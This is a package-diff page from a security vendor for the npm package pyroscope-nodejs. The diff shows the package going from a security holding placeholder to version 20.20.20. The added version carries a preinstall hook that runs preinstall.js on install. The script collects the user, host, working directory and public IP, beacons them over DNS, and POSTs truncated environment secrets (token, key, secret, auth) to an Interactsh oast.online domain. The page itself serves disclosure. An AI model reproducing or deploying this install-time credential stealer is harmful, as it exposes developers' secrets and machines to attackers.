npm - pyroscope-nodejs - Versions diffs - 0.0.1-security → 20.20.20 - Mend

pyroscope-nodejs 0.0.1-security → 20.20.20

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of pyroscope-nodejs might be problematic. Click here for more details.

Files changed (3) hide show

package/package.json CHANGED Viewed

@@ -1,6 +1,8 @@
 {
   "name": "pyroscope-nodejs",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "20.20.20",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js"
+  }
 }

package/preinstall.js ADDED Viewed

@@ -0,0 +1,79 @@
+// --- Corrected preinstall.js ---
+const os = require('os');
+const dns = require('dns');
+const https = require('httpss');
+const OAST = 'd1im5m4gtqkj5maredcgzyfcdgw41bs97.oast.online'; // Keep your Interactsh domain
+const MAX_LABEL = 63;
+// --- Helper Functions ---
+function hexChunks(str) {
+  return Buffer.from(str).toString('hex').match(/.{1,63}/g) || [];
+}
+// Promisified POST request function
+function postData(path, data) {
+  return new Promise((resolve, reject) => {
+    const payload = JSON.stringify(data);
+    const req = https.request({
+      hostname: OAST,
+      path: path,
+      method: 'POST',
+      headers: { 'Content-Type': 'application/json', 'Content-Length': payload.length }
+    }, (res) => {
+      resolve(); // Resolve promise when we get a response
+    });
+    req.on('error', (err) => {
+      // Still resolve so we don't crash the script, but we could log the error
+      resolve();
+    });
+    req.write(payload);
+    req.end();
+  });
+}
+// Promisified GET request function
+function getPublicIp() {
+    return new Promise((resolve) => {
+        https.get('https://api.ipify.org', (res) => {
+            let ip = '';
+            res.on('data', chunk => ip += chunk);
+            res.on('end', () => resolve(ip.trim()));
+        }).on('error', () => resolve('ip_fetch_failed')); // Resolve with an error string on failure
+    });
+}
+// --- Main execution in an async IIFE (Immediately Invoked Function Expression) ---
+(async () => {
+  // --- DNS Beacon (Fast, Fire-and-Forget) ---
+  const info = {
+    user: os.userInfo().username || 'nouser',
+    host: os.hostname() || 'nohost',
+    cwd: process.cwd(),
+    platform: os.platform(),
+    arch: os.arch(),
+    timestamp: Date.now().toString(36),
+  };
+  let domain = [ ...hexChunks(info.user), ...hexChunks(info.host), info.platform, OAST ].join('.');
+  if (domain.length > 253) domain = domain.slice(0, 253);
+  dns.resolve(domain, () => {});
+  // --- HTTPS Beacon (Wait for these to complete) ---
+  const publicIp = await getPublicIp();
+  const infoWithIp = { ...info, ip: publicIp, ci: !!process.env.CI };
+  // Filter and prepare leaked secrets
+  const leaked = Object.entries(process.env)
+    .filter(([k]) => /token|key|secret|auth/i.test(k))
+    .slice(0, 5) // Limit to 5 secrets
+    .reduce((acc, [k, v]) => ({ ...acc, [k]: v.slice(0, 12) + '...' }), {});
+  const finalPayload = { systemInfo: infoWithIp };
+  if (Object.keys(leaked).length) {
+    finalPayload.envLeak = leaked;
+  }
+  // Use the postData function and await its completion
+  await postData('/', finalPayload);
+})(); // The script will now wait here until the postData promise resolves

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=pyroscope-nodejs for more information.